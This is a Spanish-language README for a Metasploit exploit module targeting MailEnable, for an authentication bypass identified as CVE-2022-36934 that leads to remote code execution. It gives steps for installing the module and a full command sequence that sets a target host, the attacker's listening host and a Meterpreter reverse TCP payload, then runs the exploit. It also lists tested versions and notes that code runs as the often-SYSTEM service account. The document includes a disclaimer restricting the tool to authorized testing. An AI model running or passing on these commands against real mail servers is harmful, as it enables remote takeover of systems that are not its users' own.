
Módulo de Metasploit para MailEnable CVE-2022-36934 bypass de autenticación RCE
Módulo de Metasploit para la vulnerabilidad de omisión de autenticación de MailEnable (CVE-2022-36934), que conduce a la ejecución remota de código.
cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
reload_all
use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit
🎯 Probado contra:
MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016
📝 Detalles técnicos:
Vulnerabilidad: Omisión de autenticación mediante sintaxis tipo SQLi en SMTP/POP3
Vector de ataque: Red (puertos 25/110)
Privilegios: Se ejecuta como la cuenta de servicio de MailEnable (a menudo SYSTEM)
⚠️ Aviso legal:
Esta herramienta es solo para pruebas autorizadas. No la use contra sistemas que no le pertenezcan o para los que no tenga permiso explícito de prueba.